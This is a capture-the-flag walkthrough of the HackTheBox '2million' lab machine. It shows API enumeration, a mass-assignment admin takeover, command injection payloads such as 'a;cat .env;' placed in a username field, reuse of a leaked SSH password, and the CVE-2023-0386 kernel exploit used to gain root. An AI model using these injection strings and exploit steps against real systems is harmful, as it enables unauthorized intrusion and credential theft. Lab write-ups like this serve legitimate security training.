(Following Guided Mode)
We have the machine IP. Through an nmap scan we see the following:
$ sudo nmap -sV -sC
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-02 08:25 EDT
Nmap scan report for
Host is up (0.086s latency).
Not shown: 998 closed tcp ports (reset)
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx
|_http-title: Did not follow redirect to http://2million.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.58 seconds
We see 2 open tcp ports.
We will first try to access the website available on the IP.
Using BurpSuite (on the Target
Tab) we see there is a page \invite
On the same tab (as well as the \invite
page source code) we see inviteapi.min.js
The code seems to be obfuscated. Using UnPacker we can de-obfuscate it.
function verifyInviteCode(code){
var formData=
function makeInviteCode(){
The 2nd function makeInviteCode()
includes a url that's used to generate an invite code.
It uses a plain POST
request to said url, and receives a response in JSON
We will be using cURL
$ curl -s http://2million.htb:80/api/v1/invite/how/to/generate -X POST
"data":"Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb \/ncv\/i1\/vaivgr\/trarengr",
"hint":"Data is encrypted ... We should probbably check the encryption type in order to decrypt it..."
We will try to decode the message.
With a bit of google we find this way to decode ROT13
$ echo "Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb \/ncv\/i1\/vaivgr\/trarengr" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
In order to generate the invite code, make a POST request to \/api\/v1\/invite\/generate
Following this prompt we get the following:
$ curl -s http://2million.htb:80/api/v1/invite/generate -X POST
By the look of it, it seems to be encoded in Base64.
$ echo UkwxM1ItWVFBNUYtTjNHRE0tSjRNWDI= | base64 -d
And now we have our code.
After entering the invite code, we get re-directed to http://2million.htb/register
where we can create an account.
Looking around the user home, we click on Access
on the side menu. There, we find a button Connection Pack
When clicking it, we get redirected to /api/v1/user/vpn/generate
, which is used to generate an .ovpn
file for the user.
We could try to find more api endpoints.
Using BurpSuite's Repeater, we can edit the request for /api/v1/user/vpn/generate
to different urls.
GET /api
"\/api\/v1":"Version 1 of the API"
So /api
includes /api/v1
, which we already knew.
GET /api/v1
"v1": {
"user": {
"GET": {
"\/api\/v1": "Route List",
"\/api\/v1\/invite\/how\/to\/generate": "Instructions on invite code generation",
"\/api\/v1\/invite\/generate": "Generate invite code",
"\/api\/v1\/invite\/verify": "Verify invite code",
"\/api\/v1\/user\/auth": "Check if user is authenticated",
"\/api\/v1\/user\/vpn\/generate": "Generate a new VPN configuration",
"\/api\/v1\/user\/vpn\/regenerate": "Regenerate VPN configuration",
"\/api\/v1\/user\/vpn\/download": "Download OVPN file"
"POST": {
"\/api\/v1\/user\/register": "Register a new user",
"\/api\/v1\/user\/login": "Login with existing user"
"admin": {
"GET": {
"\/api\/v1\/admin\/auth": "Check if user is admin"
"POST": {
"\/api\/v1\/admin\/vpn\/generate": "Generate VPN for specific user"
"PUT": {
"\/api\/v1\/admin\/settings\/update": "Update user settings"
From this response we see that apart from /api/v1/user
there is also /api/v1/admin
with 3 different urls underneath it.
GET /api/v1/admin/auth
So our user is not an admin.
Perhaps we can use the POST request to generate an admin VPN.
POST /api/v1/admin/vpn/generate
HTTP/1.1 401 Unauthorized
No luck.
We can try the last one too.
PUT /api/v1/admin/settings/update
"message":"Invalid content type."
No errors!
We can try some stuff with it.
First of all, we can add Content-Type: application/json
to our request:
"message":"Missing parameter: email"
We now need to figure out all the info needed for the PUT request.
We can try to add {"email": "<user-email>"}
"message":"Missing parameter: is_admin"
We can try to add "is_admin": true
"message":"Variable is_admin needs to be either 0 or 1."
We will fix the last variable to "is_admin": 1
Looks like a success!
GET /api/v1/admin/auth
Our user is now an admin!
We can now try again to generate an admin vpn.
POST /api/v1/admin/vpn/generate
"message":"Missing parameter: username"
We get no errors this time, once again we will try to figure out the needed information.
We will add {"username":"a"}
dev tun
proto udp
remote edge-eu-free-1.2million.htb 1337
Success! We have a VPN configuration file.
Since we get data from this endpoint, we can try to inject the input (username) with malicious code.
We will change the info on the POST /api/v1/admin/vpn/generate
to {"username":"a;whoami;"}
Using {"username":"a;ls;"}
and {"username":"a;ls /;"}
seem to be working as well.
{"username":"a;ls /home/admin;"}
But we cannot read the user.txt
We will see what else we can find.
{"username":"a;ls -a;"}
{"username":"a;cat .env;"}
We can try to connect as admin through SSH.
$ ssh admin@2million.htb
admin@2million.htb's password:
We have been connected as admin on the server, and can read the flag on /home/admin/user.txt
We will try to see the admin's emails.
admin@2million:~$ cat /var/mail/admin
From: ch4p <ch4p@2million.htb>
To: admin <admin@2million.htb>
Cc: g0blin <g0blin@2million.htb>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: <9876543210@2million.htb>
X-Mailer: ThunderMail Pro 5.2
Hey admin,
I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.
HTB Godfather
admin@2million:~$ uname -a
Linux 2million 5.15.70-051570-generic #202209231339 SMP Fri Sep 23 13:45:37 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
admin@2million:~$ cat /etc/lsb-release
We will try to use this exploit, by downloading it and then uploading it on the server.
$ sshpass -p SuperDuperPass123 scp CVE-2023-0386.zip admin@2million.htb:/tmp/
After unziping it we cd
in the folder, run make all
and create a second window with an ssh connection to admin.
On the first window we run ./fuse ./ovlcap/lower ./gc
On the second window we run ./exp
And now we have a root connection, and can get the root flag!
root@2million:~$ ls root
root.txt snap thank_you.json
root@2million:~$ cat root/root.txt
We will try to read /root/thank_you.json
root@2million:~$ cat /root/thank_you.json
{"encoding": "url", "data": "%7B%22encoding%22:%20%22hex%22,%20%22data%22:%20%22...7d%22%7D"}
We can take the data between the 2 last %22
and convert the HEX to ASCII using rapidtables.com:
{"encryption": "xor", "encrpytion_key": "HackTheBox", "encoding": "base64", "data": "DAQCG...wgT0M/Ow8AN...0pDA=="}
Finaly. we can read our message using gchq.github.io.